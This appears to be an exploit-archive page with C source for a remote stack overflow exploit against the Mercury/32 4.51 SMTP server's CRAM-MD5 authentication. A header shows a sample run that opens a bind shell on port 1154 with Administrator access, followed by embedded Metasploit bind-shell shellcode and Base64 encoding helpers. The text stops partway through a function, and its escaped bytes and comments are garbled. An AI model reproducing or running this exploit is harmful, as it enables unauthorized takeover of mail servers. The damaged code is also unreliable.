Home / exploits mercurycrammd5-overflow.txt
Posted on 24 August 2007
/* Mercury/32 4.51 SMTPD CRAM-MD5 Pre-Auth Remote Stack Overflow(Universal) Public Version 1.0 http://www.ph4nt0m.org 2007-08-22 Code by: Zhenhan.Liu Original POC: http://www.milw0rm.com/exploits/4294 Vuln Analysis: http://pstgroup.blogspot.com/2007/08/tipsmercury-smtpd-auth-cram-md5-pre.html Our Mail-list: http://list.ph4nt0m.org (Chinese) It will bind a cmdshell on port 1154 if successful. Z:ExpMercury SMTPD>mercury_smtpd.exe 127.0.0.1 25 == Mercury/32 4.51 SMTPD CRAM-MD5 Pre-Auth Remote Stack Overflow == Public Version 1.0 == http://www.ph4nt0m.org 2007-08-22 [*] connect to 127.0.0.1:25 ... OK! [C] EHLO void#ph4nt0m.org [S] 220 root ESMTP server ready. [S] 250-root Hello void#ph4nt0m.org; ESMTPs are: 250-TIME [S] 250-SIZE 0 [S] 250 HELP [C] AUTH CRAM-MD5 [S] 334 PDM0OTg4MjguMzQ2QHJvb3Q+ [C] Send Payload... [-] Done! cmdshell@1154? Z:ExpMercury SMTPDMercury SMTPD>nc -vv 127.0.0.1 1154 DNS fwd/rev mismatch: localhost != gnu localhost [127.0.0.1] 1154 (?) open Microsoft Windows XP [°æ±¾ 5.1.2600] (C) °æȨËùÓÐ 1985-2001 Microsoft Corp. e:MERCURY>whoami whoami Administrator */ #include <io.h> #include <stdio.h> #include <winsock2.h> #pragma comment(lib, "ws2_32") /* win32_bind - EXITFUNC=thread LPORT=1154 Size=317 Encoder=None http://metasploit.com */ unsigned char shellcode[] = "xfcx6axebx4dxe8xf9xffxffxffx60x8bx6cx24x24x8bx45" "x3cx8bx7cx05x78x01xefx8bx4fx18x8bx5fx20x01xebx49" "x8bx34x8bx01xeex31xc0x99xacx84xc0x74x07xc1xcax0d" "x01xc2xebxf4x3bx54x24x28x75xe5x8bx5fx24x01xebx66" "x8bx0cx4bx8bx5fx1cx01xebx03x2cx8bx89x6cx24x1cx61" "xc3x31xdbx64x8bx43x30x8bx40x0cx8bx70x1cxadx8bx40" "x08x5ex68x8ex4ex0execx50xffxd6x66x53x66x68x33x32" "x68x77x73x32x5fx54xffxd0x68xcbxedxfcx3bx50xffxd6" "x5fx89xe5x66x81xedx08x02x55x6ax02xffxd0x68xd9x09" "xf5xadx57xffxd6x53x53x53x53x53x43x53x43x53xffxd0" "x66x68x04x82x66x53x89xe1x95x68xa4x1ax70xc7x57xff" "xd6x6ax10x51x55xffxd0x68xa4xadx2exe9x57xffxd6x53" "x55xffxd0x68xe5x49x86x49x57xffxd6x50x54x54x55xff" "xd0x93x68xe7x79xc6x79x57xffxd6x55xffxd0x66x6ax64" "x66x68x63x6dx89xe5x6ax50x59x29xccx89xe7x6ax44x89" "xe2x31xc0xf3xaaxfex42x2dxfex42x2cx93x8dx7ax38xab" "xabxabx68x72xfexb3x16xffx75x44xffxd6x5bx57x52x51" "x51x51x6ax01x51x51x55x51xffxd0x68xadxd9x05xcex53" "xffxd6x6axffxffx37xffxd0x8bx57xfcx83xc4x64xffxd6" "x52xffxd0x68xefxcexe0x60x53xffxd6xffxd0"; // Base64×Ö·û¼¯ __inline char GetB64Char(int index) { const char szBase64Table[] = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"; if (index >= 0 && index < 64) return szBase64Table[index]; return '='; } // ´ÓË«×ÖÖÐÈ¡µ¥×Ö½Ú #define B0(a) (a & 0xFF) #define B1(a) (a >> 8 & 0xFF) #define B2(a) (a >> 16 & 0xFF) #define B3(a) (a >> 24 & 0xFF) // ±àÂëºóµÄ³¤¶ÈÒ»°ã±ÈÔÎĶàÕ¼1/3µÄ´æ´¢¿Õ¼ä£¬Çë±£Ö¤base64codeÓÐ×ã¹»µÄ¿Õ¼ä inline int Base64Encode(char * base64code, const char * src, int src_len) { if (src_len == 0) src_len = strlen(src); int len = 0; unsigned char* psrc = (unsigned char*)src; char * p64 = base64code; for (int i = 0; i < src_len - 3; i += 3) { unsigned long ulTmp = *(unsigned long*)psrc; register int b0 = GetB64Char((B0(ulTmp) >> 2) & 0x3F); register int b1 = GetB64Char((B0(ulTmp) << 6 >> 2 | B1(ulTmp) >> 4) & 0x3F); register int b2 = GetB64Char((B1(ulTmp) << 4 >> 2 | B2(ulTmp) >> 6) & 0x3F); register int b3 = GetB64Char((B2(ulTmp) << 2 >> 2) & 0x3F); *((unsigned long*)p64) = b0 | b1 << 8 | b2 << 16 | b3 << 24; len += 4; p64 += 4; psrc += 3; } // ´¦Àí×îºóÓàϵIJ»×ã3×ֽڵĶöÊý¾Ý if (i < src_len) { int rest = src_len - i; unsigned long ulTmp = 0; for (int j = 0; j < rest; ++j) { *(((unsigned char*)&ulTmp) + j) = *psrc++; } p64[0] = GetB64Char((B0(ulTmp) >> 2) & 0x3F); p64[1] = GetB64Char((B0(ulTmp) << 6 >> 2 | B1(ulTmp) >> 4) & 0x3F); p64[2] = rest > 1 ? GetB64Char((B1(ulTmp) << 4 >> 2 | B2(ulTmp) >> 6) & 0x3F) : '='; p64[3] = rest > 2 ? GetB64Char((B2(ulTmp) << 2 >> 2) & 0x3F) : '='; p64 += 4; len += 4; } *p64 = '